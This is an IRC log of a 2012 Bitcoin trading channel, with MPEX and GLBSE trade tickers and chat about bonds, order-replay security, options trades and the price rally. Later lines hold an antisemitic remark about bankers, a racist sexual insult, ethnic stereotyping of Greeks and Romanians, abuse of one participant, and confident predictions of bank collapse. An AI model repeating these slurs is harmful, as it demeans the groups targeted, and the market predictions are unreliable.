registered to deposit. DO NOT send money if your key is not registered. (You can check if it is with STAT)." Aug 17 05:14:29 that's safe for me, right? Aug 17 05:14:38 if you can see a stat it's safe for you. Aug 17 05:15:03 what will stat tell me? I ran it and it gave me a bunch of info Aug 17 05:15:31 the fact that it gives you info proves you have a key registered. Aug 17 05:15:36 mircea_popescu: it think it may be benificial to have that nondiv equity share, consider if the shareholders wanted to fire an officer, right now, the only way they can do that is by dissolving the whole operation Aug 17 05:15:42 mircea_popescu: cool Aug 17 05:15:54 smickles trust me, you're just opening the door to forum drama. Aug 17 05:16:08 if they fire either one of you that operation is canned anyway. Aug 17 05:17:09 [MPEX] [S.MPOE] 26122 @ 0.0003965 = 10.3574 BTC [+] Aug 17 05:17:10 so then a proper bond would be the way to go Aug 17 05:17:40 [GLBSE] [OBSI.HRPT] 23 @ 0.10387 = 2.389 BTC [-] Aug 17 05:17:42 maybe, tho honestly, if you're offering bank bonds it'd make more sense to just give up all pretense and tranche them in a cdo Aug 17 05:17:42 [GLBSE] [OBSI.HRPT] 17 @ 0.10388 = 1.766 BTC [+] Aug 17 05:17:50 [MPEX] [S.MPOE] 19090 @ 0.00039164 = 7.4764 BTC [-] Aug 17 05:17:52 [MPEX] [S.MPOE] 6689 @ 0.00038888 = 2.6012 BTC [-] Aug 17 05:17:52 [MPEX] [S.MPOE] 37021 @ 0.00037839 = 14.0084 BTC [-] Aug 17 05:18:37 [GLBSE] [OBSI.HRPT] 3 @ 0.10388 = 0.3116 BTC [+] Aug 17 05:18:41 1btc face X% interest paid in cupon installments, with the face being bought back at Y date Aug 17 05:19:24 cupon? Aug 17 05:19:33 bah Aug 17 05:20:37 bought back? Aug 17 05:20:39 bah Aug 17 05:20:49 i remember the function, but not the label Aug 17 05:21:01 the face would be paid, not bought back Aug 17 05:22:40 anyone interested in underwriting that? Aug 17 05:26:33 mmm Aug 17 05:26:52 well as i said, i'd consider it for new mpcd if they seem worth doing in nov. Aug 17 05:28:43 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9979 BTC [-] Aug 17 05:30:43 mircea_popescu: what sort of cupor would you want us to pay Aug 17 05:31:05 do you know how to gauss-copula evaluate ? Aug 17 05:31:07 *coupon Aug 17 05:32:41 woa wtf Aug 17 05:33:04 that's a little beyond me right now Aug 17 05:33:04 im listening to rebel girl from bikini kill Aug 17 05:33:08 aren't i old school. Aug 17 05:33:25 smickles : well if you feel like learning wizardry you can futz with that stuff. Aug 17 05:33:31 could be worse Aug 17 05:33:39 otherwise, how many tranches do you plan ? Aug 17 05:33:40 it could be atari teenage riot - revolution action Aug 17 05:33:57 the video is particularly bad. Aug 17 05:34:01 lol Aug 17 05:34:06 "Some believe the methodology of applying the Gaussian copula to credit derivatives to be one of the reasons behind the global financial crisis of 2008–2009." Aug 17 05:34:18 well yes for sure. Aug 17 05:34:50 smickles : that thing is a mathematical approach to evaluating the likeliness of joint default in similar assets. Aug 17 05:35:04 mircea_popescu: your protocol seems vulnerable to replays Aug 17 05:35:10 some people started using it as a definitive model of assesing risk, and as a result fucked up pretty bad. Aug 17 05:35:18 copumpkin have you tried one ? Aug 17 05:35:21 nope Aug 17 05:35:26 is it not? Aug 17 05:35:27 do try Aug 17 05:35:33 oh okay Aug 17 05:36:03 if you are really concerned about it you can add all pipes and junk afterwards. Aug 17 05:36:12 hah it's okay Aug 17 05:36:18 I'm not Aug 17 05:36:20 BUY|{MPSIC}|{quantity}|{price}|{expiry}|dfgjdfklgj Aug 17 05:36:37 tho i don't see why it'd be necessary. Aug 17 05:37:09 you could fuck with someone's account Aug 17 05:37:16 and buy/sell shit they didn't want to buy/sell Aug 17 05:37:31 no man. i understand what replaysare. Aug 17 05:37:41 im just saying, they aren;'t allowed by the system. Aug 17 05:37:48 copumpkin: you mean someone sniffs the transmission of your 'buy|x|Y|z' and sends it again? Aug 17 05:37:49 cool :) Aug 17 05:37:54 yeah. Aug 17 05:37:56 smickles: well, it's encrypted Aug 17 05:38:00 but yeah Aug 17 05:38:18 man in the middle could just get the encrypted string and send it again Aug 17 05:38:29 if they are just trying to f with you, i don't see why it being encrypted would matter Aug 17 05:38:33 it'd do him no good, seeing as he can't even be sure whose account he's fucking necessarily. Aug 17 05:38:39 but it might cause trouble for the holder. Aug 17 05:38:50 that's what I meant Aug 17 05:38:56 it'd just be to fuck with everyone Aug 17 05:39:48 of course, mpex is the only place where this actually isn't possible Aug 17 05:39:48 so does copumpkin get teh 1.337 btc? Aug 17 05:39:57 otherwise everyone including mtgox is actually vulnerable to this. Aug 17 05:40:07 why ? Aug 17 05:40:24 because i'm tired, and wrong, i guess Aug 17 05:40:31 lol Aug 17 05:40:58 wait a sec Aug 17 05:41:16 iirc, i've send duplicate STATs to mpex Aug 17 05:41:24 mircea_popescu: did you get my deposit? :) Aug 17 05:41:30 it told me to stfu and do it properly Aug 17 05:41:43 copumpkin ;) didja check ? Aug 17 05:41:49 smickles well yes. Aug 17 05:41:49 so much work!! Aug 17 05:42:05 [GLBSE] [BDT] 5 @ 0.99 = 4.95 BTC [+] Aug 17 05:42:21 mircea_popescu: so mpex isn't vernerable to that 'fuck with em' attack :D Aug 17 05:42:25 mircea_popescu: yay Aug 17 05:42:26 well no. Aug 17 05:42:44 that's what i said, afaik pretty much the only place that isn't. Aug 17 05:43:03 course, it's a lot more difficult to do for traditional sites esp over https. Aug 17 05:43:17 well, https is designed to stop it Aug 17 05:43:24 at least in theory yea. Aug 17 05:43:42 somebody had a session stolen on glbse recently tho, iirc. Aug 17 05:43:44 there are limits. Aug 17 05:46:21 [GLBSE] [YABMC] 15 @ 0.1178 = 1.767 BTC [-] Aug 17 05:48:02 [GLBSE] [YABMC] 1 @ 0.1179 BTC [+] Aug 17 05:48:07 [MPEX] [O.HASH.P10TH] 99272 @ 0.02744461 = 2724.4813 BTC [-] Aug 17 05:48:28 [MPEX] [O.BTCUSD.P130T] 10 @ 0.07598909 = 0.7599 BTC [-] Aug 17 05:48:39 [GLBSE] [YABMC] 15 @ 0.1178 = 1.767 BTC [-] Aug 17 05:49:43 [GLBSE] [YABMC] 7 @ 0.1179 = 0.8253 BTC [+] Aug 17 05:49:59 anyway, smickles that's the drawbacK : people could legitimately repeat their stats Aug 17 05:50:18 it just doesn't seem worth the risk tho, sooner or later some asshat is gonna use it to wreak havoc Aug 17 05:50:24 [GLBSE] [GIGAMINING] 2 @ 1.02799999 = 2.056 BTC [-] Aug 17 05:51:50 mircea_popescu: dammit! Aug 17 05:52:04 forgot a decimal and now you own my options :P for nothing at all Aug 17 05:52:11 umm Aug 17 05:52:15 what ?! Aug 17 05:52:27 lol Aug 17 05:52:27 Your transactions since 1 hour before your last STAT : Aug 17 05:52:27 On Fri, 17 Aug 12 02:48:31 +0000 O.BTCUSD.P130T - 10 sold @0.07598909BTC, total yield 0.75837111BTC Aug 17 05:52:34 accidentally sold them for 0.0075 Aug 17 05:52:38 lol Aug 17 05:52:46 o and you hit the bot's bid huh Aug 17 05:52:51 yup :P Aug 17 05:53:02 well ty do come again Aug 17 05:53:06 lol Aug 17 05:53:09 will do :) Aug 17 05:53:37 0.07596438 nao Aug 17 05:53:38 so nom. Aug 17 05:54:21 but wait. if the bot sells for .11... what was the ideea charging .75 per ?! Aug 17 05:55:36 [GLBSE] [NASTY] 6 @ 0.51 = 3.06 BTC [+] Aug 17 05:56:46 [MPEX] [S.MPOE] 37 @ 0.0003965 = 0.0147 BTC [+] Aug 17 05:56:48 if people legitimately repeat their stat, wouldn't the pg encryption or signing produce difference between the 2 stats Aug 17 05:57:01 [MPEX] [S.MPOE] 16900 @ 0.00037839 = 6.3948 BTC [-] Aug 17 05:57:29 yeah, they do Aug 17 05:57:50 [GLBSE] [BTC-MINING] 1 @ 0.9888 BTC [+] Aug 17 05:57:58 and if i double send an idendical stat to mpex, from what i remember, it rejects the second Aug 17 05:58:14 [GLBSE] [TYGRR.BOND-P] 2 @ 0.998 = 1.996 BTC [+] Aug 17 05:58:27 it does reject the 2nd. what i meant was ppl just save the pgp'd stat and just keep piping that. arguably more comfortable. Aug 17 05:58:29 not rly tho Aug 17 05:59:07 http://www.google.com/url?sa=t&rct=j&q=Tihan+Seale&source=web&cd=6&cad=rja&ved=0CFcQFjAF&url=http%3A%2F%2Fwww.wiwd.uscourts.gov%2Fopinions%2Fpdfs%2F2003-2005%2F05-C-368-C-11-04-05.PDF&ei=nbItUImLFYek4AS-soCQBQ&usg=AFQjCNHPapd-v-AyBwkLrAbRCkdL93SwFg Aug 17 05:59:20 would you say this is tihan seale of bitcoinica in thst lawsuit ? Aug 17 06:00:29 [MPEX] [O.BTCUSD.P090N] 9 @ 0.0911313 = 0.8202 BTC [-] Aug 17 06:06:50 [GLBSE] [TYGRR.BOND-P] 4 @ 0.99021 = 3.9608 BTC [-] Aug 17 06:07:10 [GLBSE] [TYGRR.BOND-P] 6 @ 0.99 = 5.94 BTC [-] Aug 17 06:07:14 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99 = 1.98 BTC [-] Aug 17 06:07:32 Speaking of that, Zhou I wanted your thoughts on the financial situation. Aug 17 06:07:32 As you know, Bitcoinica went from cranking out 6-figure profit one month to Aug 17 06:07:32 a flatline the next. I covered most of the deficit from the hack on the Aug 17 06:07:32 assumption Bitcoinica profits would quickly fill in the rest. What's Aug 17 06:07:32 happened instead is a consistent equity leak that has remained unresolved Aug 17 06:07:32 for two months. We've gone from being short 40k to now being short 88k. Aug 17 06:07:36 ohohoh. Aug 17 06:08:38 the judgement on that thing is stupid... Aug 17 06:09:23 its him tho isnt it. Aug 17 06:10:00 not sure, but nice find Aug 17 06:10:01 [GLBSE] [PUREMINING] 25 @ 0.15 = 3.75 BTC [-] Aug 17 06:10:09 [GLBSE] [TYGRR.BOND-P] 14 @ 0.9825 = 13.755 BTC [-] Aug 17 06:10:49 *listings Aug 17 06:13:46 Speaking of that, Zhou please repeatedly stab your tiny asian dick into my waiting anus Aug 17 06:13:56 eh ?! Aug 17 06:13:59 [GLBSE] [FPGAMINING] 4 @ 0.8901 = 3.5604 BTC [-] Aug 17 06:14:09 thats a rough translation Aug 17 06:14:17 i've writen a fun bit of code which converts Ts and Ns into the appropriate dates which even accounts for the fact that Ts after the last friday actually referr to next month's last friday Aug 17 06:14:18 lol Aug 17 06:15:08 not so hard to do Aug 17 06:15:14 are you using the new vwap ? Aug 17 06:16:10 2 points (60% like it) 6 up votes 4 down votes Aug 17 06:16:13 omg why the hate! Aug 17 06:16:15 i'm proud that I wrote it as a one-liner :D Aug 17 06:16:25 mircea_popescu: at least I didn't get screwed too badly :) Aug 17 06:16:34 [GLBSE] [FPGAMINING] 5 @ 0.8999 = 4.4995 BTC [+] Aug 17 06:16:39 [GLBSE] [FPGAMINING] 15 @ 0.9 = 13.5 BTC [+] Aug 17 06:16:52 [GLBSE] [BTC-MINING] 6 @ 0.99991 = 5.9995 BTC [+] Aug 17 06:17:13 what's volsh and volsa? Aug 17 06:17:25 copumpkin "repeatedly stab your tiny asian dick into my waiting anus" ? Aug 17 06:17:29 lol Aug 17 06:17:49 smickles a little bonbon : volume in shares, volume in satoshi Aug 17 06:18:12 i was hoping it was that Aug 17 06:18:18 pretty cool huh Aug 17 06:18:53 yeah, i like all the new data, but i still haven't updated the relavent parts of my 'opteron' program Aug 17 06:20:01 the parts of it i use most often only need the market depth data Aug 17 06:20:20 and, afaik, you haven't messed w/that since i wrote it Aug 17 06:21:11 indeed not. Aug 17 06:21:50 Total agree bets: 0.00 Aug 17 06:21:50 Total disagree bets: 1.00 Aug 17 06:21:59 o wow. srsly ?! Aug 17 06:24:55 yeah...why would anyone put in the effort for 1.337 btc? Aug 17 06:25:31 you know, donald knuth only paid 256 cents. Aug 17 06:25:33 iirc. Aug 17 06:25:57 tons of people went hogwild over that shitty bitdaytrade site and there was no money there either. Aug 17 06:30:40 [GLBSE] [BTC-MINING] 1 @ 0.99991 BTC [+] Aug 17 06:30:49 [GLBSE] [MINING] 20 @ 0.8 = 16 BTC [+] Aug 17 06:36:17 [GLBSE] [NYAN.C] 3 @ 1.069 = 3.207 BTC [+] Aug 17 06:36:59 [GLBSE] [BITBOND] 1 @ 0.399899 BTC [+] Aug 17 06:39:10 [GLBSE] [YABMC] 2 @ 0.1179 = 0.2358 BTC [+] **** BEGIN LOGGING AT Fri Aug 17 15:22:46 2012 Aug 17 15:23:15 omg mpex is still online how can this be!? Aug 17 15:23:25 [GLBSE] [BIB.PIRATE] 3 @ 0.985 = 2.955 BTC [-] Aug 17 15:24:09 [GLBSE] [BIB.PIRATE] 34 @ 0.975 = 33.15 BTC [-] Aug 17 15:25:16 sgornick i didn't even know bitbin existed! Aug 17 15:29:55 [GLBSE] [PUREMINING] 4 @ 0.149 = 0.596 BTC [-] Aug 17 15:30:09 [MPEX] [O.BTCUSD.P170N] 2 @ 0.45523861 = 0.9105 BTC [-] Aug 17 15:30:41 [GLBSE] [PUREMINING] 15 @ 0.15 = 2.25 BTC [+] Aug 17 15:45:09 wow Aug 17 15:45:14 someones about to make a lot of money on bitvps Aug 17 15:46:12 [GLBSE] [YARR] 1 @ 1.42 BTC [+] Aug 17 15:46:42 [GLBSE] [YARR] 3 @ 1.42979 = 4.2894 BTC [+] Aug 17 15:48:09 [MPEX] [F.GIGA.ETF] 5900 @ 0.00090127 = 5.3175 BTC [-] Aug 17 15:48:38 [GLBSE] [OBSI.HRPT] 2 @ 0.09999999 = 0.2 BTC [-] Aug 17 15:49:08 [GLBSE] [OBSI.HRPT] 1 @ 0.09999999 BTC [-] Aug 17 15:54:12 anyone oticing anything weird on mpex right now? Aug 17 16:02:46 [GLBSE] [FPGAMINING] 1 @ 0.849 BTC [-] Aug 17 16:09:32 [GLBSE] [FPGA.CONTRACT] 2 @ 0.1389 = 0.2778 BTC [-] Aug 17 16:10:28 [GLBSE] [NYAN.C] 4 @ 1.069 = 4.276 BTC [+] Aug 17 16:14:04 [GLBSE] [YARR] 4 @ 1.42988999 = 5.7196 BTC [+] Aug 17 17:48:00 awww assbot died ? Aug 17 17:58:55 hm I was thinking of streaming some gameing on Saturday, and I was thinking of maybe doing some charity event. Is there any good BTC charities you can donate to? Aug 17 17:59:05 like a Bitcoin development charity or something? Aug 17 17:59:12 there are two charity funds but who knows Aug 17 17:59:19 Maybe get in contact with some of the bitcoin client devs Aug 17 17:59:37 I'm currently supporting development of bitcoind, you could donate to me :p Aug 17 17:59:59 ya, give it to nano :[ Aug 17 18:00:07 ;p* Aug 17 18:00:22 Actually yeah you should use it to support the development of the client Aug 17 18:00:33 Who is nano Aug 17 18:00:41 I think I saw some kind of charity thing for convincing companies to accept Bitcoin Aug 17 18:00:48 Yea supporting a client sounds good Aug 17 18:02:50 usagi: nanotube, the ultimate bitcoiner? Aug 17 18:04:17 Not sure who that is, i live in a bubble Aug 17 18:04:45 he is the beginning and the end Aug 17 18:04:47 the alpha and the omega Aug 17 18:04:51 of all that is bitcoin on IRC Aug 17 18:05:02 the omnipresent Aug 17 18:05:04 omniscient Aug 17 18:05:08 operator of all channels Aug 17 18:05:13 the founder of gribble Aug 17 18:05:18 and his father, too Aug 17 18:05:18 I would rather support Bitcoin as a whole and not only the IRC channels Aug 17 18:05:29 nanotube is.... Aug 17 18:05:31 SATOSHI Aug 17 18:06:15 lol Aug 17 18:10:15 nanotube isn't satoshi Aug 17 18:10:40 bitscalper is satoshi. Aug 17 18:10:45 omgshit Aug 17 18:10:53 ahahah wouldn't that be the end all tho ? Aug 17 18:11:01 satoshi came back as a retarded guy with an italian accent. Aug 17 18:16:47 Who care who he his, the system is solid Aug 17 18:20:30 shall i quote ? Aug 17 18:20:35 yes, i guess i must! Aug 17 18:21:55 awww well i can;t find it now Aug 17 18:35:28 !pl DMC 1@0.48 07.30.2012 Aug 17 18:37:28 assbot is ded. Aug 17 18:47:28 that sucks ass... Aug 17 18:47:31 bot Aug 17 18:48:39 lol Aug 17 18:49:25 omfg almost 15 ?! Aug 17 18:49:36 this is unreal Aug 17 18:49:43 I did not expect that so fast. Aug 17 18:50:15 It's going to pop Aug 17 18:50:31 we must have a strong reversal soon, it has gone to fast and to long without a reversal Aug 17 18:51:32 maybe so. Aug 17 18:51:35 DeaDTerra: this is BTC. There is no logic in the market, only fear and greed Aug 17 18:51:45 also maybe so Aug 17 18:51:51 and greed is winning at the moment Aug 17 18:52:14 truth be told the us banking system is going to hell wholesale. Aug 17 18:52:30 wouldn't surprise me if we end up with $1bn dumped in. Aug 17 18:52:44 I'd be pretty surprised :P Aug 17 18:52:54 actually, all market now days are just pure greed and fear. There is very little to do with real demand Aug 17 18:53:21 that's because we live in the end of a systgem Aug 17 18:53:38 ? Aug 17 18:55:23 bretton woods. it's dead. Aug 17 18:55:36 any ideas how long it will takes to download about 8855 blocks by BTC client (about 57 days worth of blocks) Aug 17 18:55:56 depends on your connection. a coupla hours ? Aug 17 18:58:30 damn Aug 17 18:59:56 35 sec for 2 ... this is going to take forever Aug 17 19:00:14 and I have 10MB connection :) Aug 17 19:05:38 8776 Aug 17 19:06:26 so 80 in 10 minutes. >100 minutes, bout couple hours. i win :D Aug 17 19:13:21 15? Aug 17 19:14:25 In a harbinger of what may be coming our way in the Fall of 2012, billionaire financier George Soros has sold all of his equity positions in major financial stocks according to a 13-F report filed with the SEC for the quarter ending June 30, 2012. Aug 17 19:14:41 this is what im talking about. the us banking sector is going away. Aug 17 19:15:02 couldnt be sooner Aug 17 19:16:07 8683 Aug 17 19:16:41 anyway. soros put 130 mn into gold at the same time. Aug 17 19:16:52 i imagine 1% of that might have gone into btc, too. Aug 17 19:17:11 and it's how it will unwind, banks go in the pink sheets while the proceeds buy gold and a fraction thereof buys btc. Aug 17 19:18:18 1.8 h to go Aug 17 19:21:33 "banks go in the pink sheets" ? pink sheet used to mean OTC quote list Aug 17 19:21:41 what do you mean by that? Aug 17 19:21:50 i mean exactly that. Aug 17 19:22:04 jpm struggling to keep it's shares at 10 cents Aug 17 19:24:10 penny stock is not necessarily a OTC stock Aug 17 19:24:30 no, not necessarily. Aug 17 19:24:44 JPM in pink sheets - this will be a funny day Aug 17 19:25:05 fucking money grabbing jew bankers and their fkn minions Aug 17 19:25:10 i don't see how it can be avoided. us banks currently have no legitimate way to turn a profit. Aug 17 19:25:13 dead banker is a good bajnker Aug 17 19:25:29 they're merely a conduit for governmental charity, and as such the value of one share is more or less the value of one food stamp. Aug 17 19:25:33 fuck banks and all those assholes who run them Aug 17 19:26:06 aww im one of them/ Aug 17 19:26:16 y u hate bankers. Aug 17 19:26:20 no idea why is this racket even called banking any more. Aug 17 19:26:35 a, now that's a different story. we agree on that. Aug 17 19:27:15 you are a banker? Aug 17 19:27:40 You know that bank tellers are not "bankers" per se? Aug 17 19:27:43 well i don't run a bank nor am i jewish, but i'm a finance type. Aug 17 19:28:12 and i don't think there's something wrong with banking. i think the problem is us banks aren't doing any banking. Aug 17 19:28:30 your not jewish? I thought you were xD Aug 17 19:28:58 haha most people do, but i'm not. Aug 17 19:29:09 I used to work in finance for long time. Got bored and left. Never looked back Aug 17 19:29:16 what a waste of life it is. Aug 17 19:29:24 imo it's the good kind of boring. Aug 17 19:30:10 greed driven shit bags everywhere. The real loser land. Empty and useless people. Aug 17 19:30:30 greed is a good thing. Aug 17 19:30:56 It depends Aug 17 19:31:05 greed can be good if you use it in the correct way Aug 17 19:31:21 well yea. greed i suppose would be the vice of excessive appetite Aug 17 19:31:26 only if you are loser and a shitbag, then yes, because this is all you can come up with Aug 17 19:31:28 there's no life worth that name w/o appetite. Aug 17 19:31:54 greed is never good Aug 17 19:32:08 you are confusing greed with something else Aug 17 19:32:59 "Greed is the inordinate desire to possess wealth, goods, or objects of abstract value with the intention to keep it for one's self, far beyond the dictates of basic survival and comfort" Aug 17 19:33:01 Maybe I should say ambition instead Aug 17 19:33:09 yes, this is something else Aug 17 19:33:22 oaky yea, I guess what I mean is more ambition, some kind of drive to perform and do well, to do something good. Aug 17 19:33:45 who's to say waht is "inordinate" ? Aug 17 19:33:56 i don't like the stench of socialism wafting from that "dictates of basic" Aug 17 19:34:08 fuck "basic". Aug 17 19:34:21 mircea_popescu: you have no idea wtf socialism is and what it actually means Aug 17 19:34:29 so stop using it ;) Aug 17 19:34:39 socialism is the ideea that the group will solve the problems of the individual. Aug 17 19:34:49 by means of, for instance in thiscase, deciding what "too much" is. Aug 17 19:35:25 and for fuck sake, you are a greek so wtf do you even know about finance ... LOL Aug 17 19:35:55 ugh ? how am i a greek ? Aug 17 19:36:08 greek banker who wants to be a jew ... my gods, this IS the end of the world as we know it Aug 17 19:36:20 ... Aug 17 19:36:23 are you stereotyping ? Aug 17 19:36:25 lol someone took the comment about socialism very personal xD Aug 17 19:36:40 socialism has nothing to do with it Aug 17 19:36:52 well what does being greek have to do with anything ? Aug 17 19:36:56 mircea_popescu: I thought you are Greek Aug 17 19:37:05 well i thought you were an eskimo so we're even. Aug 17 19:37:22 greeks are morons, when it comes to finance Aug 17 19:37:23 hahahahh xD Aug 17 19:37:37 dude. all greek people can't be morons by virtue of being greeks Aug 17 19:37:41 it ain't how this works. Aug 17 19:37:50 really? Aug 17 19:37:53 yeah. Aug 17 19:40:59 that's pretty rasist Aug 17 19:41:07 Sorry, you must be form Romania or something like taht Aug 17 19:41:22 are those morons too ? Aug 17 19:41:36 even worst bankers. That's for sure :) Aug 17 19:41:38 Sweden but yea keep going on your rasist spree Aug 17 19:42:01 well EskimoBob... not everyone can be an eskimo you see. people are born in random places it seems. Aug 17 19:43:07 mircea_popescu: but your weather is better Aug 17 19:43:21 omg typography Aug 17 19:44:03 no shit? Aug 17 19:44:47 I'd hire mircea_popescu if he didn't bring naked women into work on leashes Aug 17 19:45:10 people who are involved in porn, deserve no respect what so ever. You know they are scammers Aug 17 19:45:14 EskimoBob for curiosity, do you recognize the people in http://www.ziuaveche.ro/wp-content/uploads/2011/10/biderberg_cfr_alaturi-guvernatorul-bnr.jpg ? Aug 17 19:45:38 copumpkin well they wouldn't have to be naked... Aug 17 19:45:39 I can not visit .ro sites :( Aug 17 19:45:54 oh wait, I'm a brontosaurus Aug 17 19:45:55 your internet a little borked ? Aug 17 19:45:57 and mircea_popescu is prejudiced against us Aug 17 19:46:12 I am prejudiced nao ?! Aug 17 19:46:28 Coinbase looks pretty neat though I am worried about security like with most online wallets :8 Aug 17 19:46:29 https://coinbase.com?r=502e73bb97a5380002008450 Aug 17 19:46:29 you said you don't do brontosaurus Aug 17 19:46:47 well i don't do guys, either Aug 17 19:46:55 does that mean im prejudiced against men ?! Aug 17 19:47:08 mircea_popescu: is this porn business true? Aug 17 19:47:11 mircea_popescu: yeah Aug 17 19:47:11 why does people involved in porn not deserve respect xD I am confused :P Aug 17 19:47:23 EskimoBob: I am a hardcore pornographer Aug 17 19:47:27 I have thousands of videos Aug 17 19:47:36 EskimoBob yes, i made lots of money from porn in the good old days. Aug 17 19:48:13 mircea_popescu: you acted or directed? Aug 17 19:48:14 or both? Aug 17 19:48:19 copumpkin mostly produced. Aug 17 19:48:39 i never acted. i guess i directed a coupla times maybe ? i dun recall. Aug 17 19:48:40 sorry dude, in this case you are a loser for life and deserve no attention at all. What a fucking scumbag. Aug 17 19:48:59 lol @ EskimoBob Aug 17 19:49:06 EskimoBob that's ok. you are on the internet nao. you meet people here that don't conform to your expectations. Aug 17 19:49:32 copumpkin i was never credited at any rate. Aug 17 19:49:44 aww Aug 17 19:51:22 question is, how soon will this romanian scumbag run with your BTC? Aug 17 19:51:33 lol Aug 17 19:51:38 he doesn't have my btc Aug 17 19:51:42 i don't ?! Aug 17 19:51:45 omg Aug 17 19:51:47 you do!!! Aug 17 19:51:47 nor mine and never will Aug 17 19:51:56 how long you been around EskimoBob ? Aug 17 19:51:57 EskimoBob: did porn murder your kitten? Aug 17 19:52:08 ;;getrating EskimoBob Aug 17 19:52:08 WARNING: Currently not authenticated. User eskimobob, rated since Sat Jun 4 09:35:57 2011. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=eskimobob Aug 17 19:52:27 hey, about the same time. Aug 17 19:52:31 for a while Aug 17 19:53:04 you wrote a haiku for btc ? Aug 17 19:53:17 ok, anything up to here. A POET ?!?! FUCKING SCUMBAGS Aug 17 19:53:24 you know poets can't be trusted. Aug 17 19:53:47 yeah, I HATE POETS Aug 17 19:53:53 they're even worse than the philosophers Aug 17 19:54:15 philosophers aren't so bad... Aug 17 19:54:19 I do not like pets Aug 17 19:54:29 (for the record, i typed ph and typed tab waiting for irc to put the rest in!) Aug 17 19:55:36 you see mircea_popescu. Porn is a business for shit birds and you have to be one to run it or get involved in this Aug 17 19:56:08 pecunia non olet, my dear northern friend. Aug 17 19:56:12 EskimoBob: you keep insulting him, but you haven't really elaborated on your position Aug 17 19:56:24 not justifying your position makes it harder to take it seriously Aug 17 19:56:25 copumpkin: I just did Aug 17 19:56:35 where? Aug 17 19:56:43 few lines back Aug 17 19:56:57 [12:54:20] I do not like pets Aug 17 19:56:58 aha Aug 17 19:57:03 I see now Aug 17 19:57:15 LOL, yes, that's the one Aug 17 19:57:23 :) Aug 17 19:58:10 will btc hit 15 today? Aug 17 19:58:24 if i say yes and it does will you hate 15 ? Aug 17 20:00:56 kakobreklaa assbot died halp. Aug 17 20:01:01 any news from nefario about the glbse upgrade? Aug 17 20:01:15 is he adding porn to it ? Aug 17 20:02:11 yeah, sorry about that. Aug 17 20:02:25 there was a post failure reboot Aug 17 20:02:28 on the server Aug 17 20:02:31 its frigging addictive that thing. Aug 17 20:03:34 mircea_popescu: you managed to shit all over yourself. Enough said Aug 17 20:04:32 aww Aug 17 20:04:38 [MPEX] [S.MPOE] 17500 @ 0.00038835 = 6.7961 BTC [+] Aug 17 20:06:26 a small one this time Aug 17 20:06:37 but hey i installed more power than diablo :) Aug 17 20:06:42 what W ? Aug 17 20:07:30 this one' Aug 17 20:07:52 small one, just under 100kw Aug 17 20:08:08 [MPEX] [S.MPOE] 5019 @ 0.00038835 = 1.9491 BTC [+] Aug 17 20:08:18 not so small hehe Aug 17 20:10:12 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 20:10:26 ;;ticker Aug 17 20:10:26 Best bid: 15.18, Best ask: 15.18001, Bid-ask spread: 0.00001, Last trade: 15.18, 24 hour volume: 88074, 24 hour low: 13.2, 24 hour high: 15.4 Aug 17 20:10:27 wtf Aug 17 20:10:33 o wow 15 omg Aug 17 20:10:53 i am kinda speechless Aug 17 20:11:01 it just jumped Aug 17 20:11:06 jesus god this is a keg of powder. Aug 17 20:11:26 today meant +2 Aug 17 20:11:38 ;;ticker EUR Aug 17 20:11:38 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Aug 17 20:12:02 how do you get EUR rate out of this gribble ? Aug 17 20:12:18 ;;ticker --last Aug 17 20:12:19 15.15 Aug 17 20:12:21 ;;bc,convert eur Aug 17 20:12:21 1 BTC = 15.15 U.S. dollars = 12.2473727 Euros Aug 17 20:12:37 EskimoBob: I'm working on it Aug 17 20:12:55 I'm due to see the new version of charts tomorrow Aug 17 20:13:09 nefario: Hola! On the update? Sweet. :) Aug 17 20:13:10 which will be a shitload faster than current version Aug 17 20:13:11 what about spitting dividend payments into twitter Aug 17 20:13:17 that has been promissed a while ago :p Aug 17 20:13:35 that comes after an end to BTC reserves Aug 17 20:13:38 div calendar will be a cool feature Aug 17 20:13:42 which is what I'm working on Aug 17 20:13:52 an iCal with divs? Aug 17 20:13:59 why not Aug 17 20:14:08 hmmm, not actually a bad idea Aug 17 20:14:22 GLBSE charts and public API will be made open source as well Aug 17 20:14:29 you can display ex-div dates on securities Aug 17 20:14:39 ciuciu: Did you get my PM on the forum? I have nothing in my outbox and am currently wondering if I managed to not sent it Aug 17 20:15:00 small changes, improvements etc that people want can be added easily then Aug 17 20:15:16 and do not forget to "paint" the issuers bid/ask in the order book Aug 17 20:15:29 hai Aug 17 20:15:35 and logged in person too Aug 17 20:16:03 So one can hes own bid/ask in order book Aug 17 20:16:50 7930... Aug 17 20:16:52 rrrr Aug 17 20:18:05 [GLBSE] [BITBOND] 1 @ 0.39989 BTC [+] Aug 17 20:18:41 [MPEX] [B.MPCD.A] 60000 @ 0.001 = 60 BTC Aug 17 20:19:24 hi mod6 Aug 17 20:20:39 sgornick is it me or that bitbin.net site doesn't actually exist ?! Aug 17 20:20:41 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 20:21:37 [MPEX] [O.BTCUSD.P120T] 10 @ 0.05050751 = 0.5051 BTC [-] Aug 17 20:23:32 ;;ticker Aug 17 20:23:33 Best bid: 15.20001, Best ask: 15.325, Bid-ask spread: 0.12499, Last trade: 15.20001, 24 hour volume: 89312, 24 hour low: 13.2, 24 hour high: 15.4 Aug 17 20:24:24 [MPEX] [S.MPOE] 33322 @ 0.00037661 = 12.5494 BTC [-] Aug 17 20:24:36 [GLBSE] [YABMC] 1 @ 0.1149 BTC [+] Aug 17 20:27:26 [MPEX] [S.MPOE] 8978 @ 0.00037358 = 3.354 BTC [-] Aug 17 20:27:28 [MPEX] [S.MPOE] 41022 @ 0.00037825 = 15.5166 BTC [+] Aug 17 20:30:09 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 20:31:41 Cheers Aug 17 20:32:06 I wasn't worried too much about a delay, just wanted to make sure I'd requested them :-) Aug 17 20:32:36 [MPEX] [S.MPOE] 7359 @ 0.00037825 = 2.7835 BTC [+] Aug 17 20:32:36 [MPEX] [S.MPOE] 10284 @ 